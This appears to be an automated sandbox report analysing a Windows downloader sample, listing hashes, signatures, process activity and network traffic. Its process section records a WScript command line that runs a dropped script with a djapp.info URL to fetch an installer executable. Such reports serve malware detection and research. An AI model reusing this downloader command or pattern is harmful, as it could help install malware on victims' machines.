Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/05/2024, 10:58 UTC

General

  • Target

    7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    7541be9044f3a1d7ab258bb36f857a2e

  • SHA1

    25b38a97fd748ef26874fa390f98597013ef102d

  • SHA256

    b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19

  • SHA512

    40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (6 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript (1 TTP)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (1 IoC)
  • Suspicious use of WriteProcessMemory (15 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe (PID 1620)
    Command line: "C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    Child processes (five WScript.exe instances, all launched with the same command line; each is flagged "Blocklisted process makes network request"):
    • C:\Windows\SysWOW64\WScript.exe (PID 4256)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
    • C:\Windows\SysWOW64\WScript.exe (PID 4644), same command line
    • C:\Windows\SysWOW64\WScript.exe (PID 2224), same command line
    • C:\Windows\SysWOW64\WScript.exe (PID 4876), same command line
    • C:\Windows\SysWOW64\WScript.exe (PID 4480), same command line
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1236)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1792 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

    Network

    DNS and HTTP activity in the order recorded. All DNS queries went to 8.8.8.8:53; "no records" means the resolver replied without any resource records. Where the report attributes a request to a process, the process name follows the query or URL; the remaining requests carry no process attribution.

    • DNS PTR 149.220.183.52.in-addr.arpa: no records
    • DNS PTR 172.210.232.199.in-addr.arpa: no records
    • DNS A www.djapp.info (WScript.exe): no records
    • DNS A www.djapp.info (WScript.exe): no records
    • DNS A bi.downthat.com (WScript.exe):
      bi.downthat.com CNAME traff-1.hugedomains.com
      traff-1.hugedomains.com CNAME hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
      hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com A 54.209.32.212, 52.71.57.184
    • HTTP GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= (WScript.exe), remote address 54.209.32.212:80
      Request:
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response:
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 10:59:33 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • DNS A chromewebstore.googleapis.com:
      A 172.217.169.10, 216.58.212.202, 216.58.212.234, 142.250.179.234, 142.250.180.10, 142.250.187.202, 142.250.187.234, 142.250.178.10, 172.217.16.234, 142.250.200.10, 142.250.200.42, 216.58.201.106, 216.58.204.74
    • DNS chromewebstore.googleapis.com, query type shown as "Unknown": no records
    • DNS A www.hugedomains.com (WScript.exe): A 172.67.70.191, 104.26.7.37, 104.26.6.37
    • DNS PTR 212.32.209.54.in-addr.arpa: PTR ec2-54-209-32-212.compute-1.amazonaws.com
    • DNS A pki.goog: A 216.239.32.29
    • DNS pki.goog, query type shown as "Unknown": no records
    • HTTP GET http://pki.goog/gsr1/gsr1.crt, remote address 216.239.32.29:80
      Request:
      GET /gsr1/gsr1.crt HTTP/1.1
      Host: pki.goog
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Response:
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Encoding: gzip
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 797
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Sun, 26 May 2024 10:45:42 GMT
      Expires: Sun, 26 May 2024 11:35:42 GMT
      Cache-Control: public, max-age=3000
      Age: 832
      Last-Modified: Wed, 20 May 2020 16:45:00 GMT
      Content-Type: application/pkix-cert
      Vary: Accept-Encoding
    • HTTP GET http://pki.goog/repo/certs/gtsr1.der, remote address 216.239.32.29:80
      Request: GET /repo/certs/gtsr1.der HTTP/1.1, with the same request headers as the gsr1.crt request above
      Response: HTTP/1.1 200 OK, with the same response headers as the gsr1.crt response except that no Content-Encoding header is present and the following differ:
      Content-Length: 1371
      Date: Sun, 26 May 2024 10:25:03 GMT
      Expires: Sun, 26 May 2024 11:15:03 GMT
      Age: 2071
      Last-Modified: Sun, 25 Jun 2023 02:58:00 GMT
    • HTTP GET http://pki.goog/repo/certs/gts1c3.der, remote address 216.239.32.29:80
      Request: GET /repo/certs/gts1c3.der HTTP/1.1, with the same request headers as the gsr1.crt request above
      Response: HTTP/1.1 200 OK, with the same response headers as the gsr1.crt response (including Content-Encoding: gzip) except that the following differ:
      Content-Length: 1304
      Date: Sun, 26 May 2024 10:53:16 GMT
      Expires: Sun, 26 May 2024 11:43:16 GMT
      Age: 378
      Last-Modified: Mon, 17 Aug 2020 09:45:00 GMT
    • DNS PTR 29.32.239.216.in-addr.arpa: PTR any-in-201d.1e100.net
    • DNS PTR 10.169.217.172.in-addr.arpa: PTR lhr25s26-in-f10.1e100.net
    • DNS PTR 228.249.119.40.in-addr.arpa: no records
    • DNS PTR 183.59.114.20.in-addr.arpa: no records
    • DNS A www.djapp.info (WScript.exe): no records
    • HTTP GET of the same bi.downthat.com error-report URL (WScript.exe), remote address 54.209.32.212:80: same request line and headers as the first bi.downthat.com request above; response HTTP/1.1 302 Found, content-length 0, date Sun, 26 May 2024 10:59:41 GMT, same location header
    • DNS PTR 56.126.166.20.in-addr.arpa: no records
    • DNS PTR 133.211.185.52.in-addr.arpa: no records
    • DNS A www.djapp.info (WScript.exe): no records
    • DNS A www.djapp.info (WScript.exe): no records
    • HTTP GET of the same bi.downthat.com error-report URL (WScript.exe), remote address 54.209.32.212:80: same request line and headers; response HTTP/1.1 302 Found, content-length 0, date Sun, 26 May 2024 10:59:55 GMT, same location header
    • DNS A www.djapp.info (WScript.exe): no records
    • HTTP GET of the same bi.downthat.com error-report URL (WScript.exe), remote address 54.209.32.212:80: same request line and headers; response HTTP/1.1 302 Found, content-length 0, date Sun, 26 May 2024 11:00:07 GMT, same location header
    • DNS A www.djapp.info (WScript.exe): no records
    • DNS A bi.downthat.com (WScript.exe):
      bi.downthat.com CNAME traff-2.hugedomains.com
      traff-2.hugedomains.com CNAME hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com A 3.130.204.160, 3.130.253.23
    • HTTP GET of the same bi.downthat.com error-report URL (WScript.exe), remote address 3.130.204.160:80: same request line and headers; response HTTP/1.1 302 Found, content-length 0, date Sun, 26 May 2024 11:00:19 GMT, same location header
    • DNS PTR 160.204.130.3.in-addr.arpa: PTR ec2-3-130-204-160.us-east-2.compute.amazonaws.com
    • DNS PTR 91.90.14.23.in-addr.arpa: PTR a23-14-90-91.deploy.static.akamaitechnologies.com
    • DNS PTR 14.227.111.52.in-addr.arpa: no records
    • DNS PTR 8.173.189.20.in-addr.arpa: no records
    Connections

    Per-connection totals. The four numeric columns are, in the order the report gives them, bytes sent, bytes received, packets sent and packets received. ERR_URL stands for the error-report URL http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    Remote address     | Domain / URL                          | Proto | Process     | Sent  | Received | Pkts sent | Pkts recv | Requests and answers
    -------------------+---------------------------------------+-------+-------------+-------+----------+-----------+-----------+------------------------------------------------
    54.209.32.212:80   | ERR_URL                               | http  | WScript.exe | 691 B | 283 B    | 6         | 3         | GET ERR_URL -> 302
    172.217.169.10:443 | chromewebstore.googleapis.com         | tls   |             | 1.0kB | 5.2kB    | 8         | 8         |
    216.239.32.29:80   | http://pki.goog/repo/certs/gts1c3.der | http  |             | 1.3kB | 6.1kB    | 10        | 10        | GET http://pki.goog/gsr1/gsr1.crt -> 200; GET http://pki.goog/repo/certs/gtsr1.der -> 200; GET http://pki.goog/repo/certs/gts1c3.der -> 200
    54.209.32.212:80   | ERR_URL                               | http  | WScript.exe | 691 B | 283 B    | 6         | 3         | GET ERR_URL -> 302
    172.67.70.191:443  | www.hugedomains.com                   |       | WScript.exe | 98 B  | 52 B     | 2         | 1         |
    54.209.32.212:80   | ERR_URL                               | http  | WScript.exe | 691 B | 283 B    | 6         | 3         | GET ERR_URL -> 302
    54.209.32.212:80   | ERR_URL                               | http  | WScript.exe | 691 B | 283 B    | 6         | 3         | GET ERR_URL -> 302
    3.130.204.160:80   | ERR_URL                               | http  | WScript.exe | 691 B | 283 B    | 6         | 3         | GET ERR_URL -> 302
    8.8.8.8:53         | 149.220.183.52.in-addr.arpa           | dns   |             | 73 B  | 147 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 172.210.232.199.in-addr.arpa          | dns   |             | 74 B  | 128 B    | 1         | 1         | 1 request
    8.8.8.8:53         | www.djapp.info                        | dns   | WScript.exe | 120 B | 278 B    | 2         | 2         | 2 requests
    8.8.8.8:53         | bi.downthat.com                       | dns   | WScript.exe | 61 B  | 191 B    | 1         | 1         | 1 request; answer 54.209.32.212, 52.71.57.184
    8.8.8.8:53         | chromewebstore.googleapis.com         | dns   |             | 75 B  | 283 B    | 1         | 1         | 1 request; answer: the 13 A records listed in the DNS detail above
    8.8.8.8:53         | chromewebstore.googleapis.com         | dns   |             | 75 B  | 132 B    | 1         | 1         | 1 request
    8.8.8.8:53         | www.hugedomains.com                   | dns   | WScript.exe | 65 B  | 113 B    | 1         | 1         | 1 request; answer 172.67.70.191, 104.26.7.37, 104.26.6.37
    8.8.8.8:53         | 212.32.209.54.in-addr.arpa            | dns   |             | 72 B  | 127 B    | 1         | 1         | 1 request
    8.8.8.8:53         | pki.goog                              | dns   |             | 54 B  | 70 B     | 1         | 1         | 1 request; answer 216.239.32.29
    8.8.8.8:53         | pki.goog                              | dns   |             | 54 B  | 128 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 29.32.239.216.in-addr.arpa            | dns   |             | 72 B  | 107 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 10.169.217.172.in-addr.arpa           | dns   |             | 73 B  | 112 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 228.249.119.40.in-addr.arpa           | dns   |             | 73 B  | 159 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 183.59.114.20.in-addr.arpa            | dns   |             | 72 B  | 158 B    | 1         | 1         | 1 request
    8.8.8.8:53         | www.djapp.info                        | dns   | WScript.exe | 60 B  | 139 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 56.126.166.20.in-addr.arpa            | dns   |             | 72 B  | 158 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 133.211.185.52.in-addr.arpa           | dns   |             | 73 B  | 147 B    | 1         | 1         | 1 request
    8.8.8.8:53         | www.djapp.info                        | dns   | WScript.exe | 120 B | 278 B    | 2         | 2         | 2 requests
    8.8.8.8:53         | www.djapp.info                        | dns   | WScript.exe | 60 B  | 139 B    | 1         | 1         | 1 request
    8.8.8.8:53         | www.djapp.info                        | dns   | WScript.exe | 60 B  | 139 B    | 1         | 1         | 1 request
    8.8.8.8:53         | bi.downthat.com                       | dns   | WScript.exe | 61 B  | 191 B    | 1         | 1         | 1 request; answer 3.130.204.160, 3.130.253.23
    8.8.8.8:53         | 160.204.130.3.in-addr.arpa            | dns   |             | 72 B  | 135 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 91.90.14.23.in-addr.arpa              | dns   |             | 70 B  | 133 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 14.227.111.52.in-addr.arpa            | dns   |             | 72 B  | 158 B    | 1         | 1         | 1 request
    8.8.8.8:53         | 8.173.189.20.in-addr.arpa             | dns   |             | 71 B  | 157 B    | 1         | 1         | 1 request

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\fufFF11.js

      Filesize

      3KB

      MD5

      3813cab188d1de6f92f8b82c2059991b

      SHA1

      4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

      SHA256

      a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

      SHA512

      83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
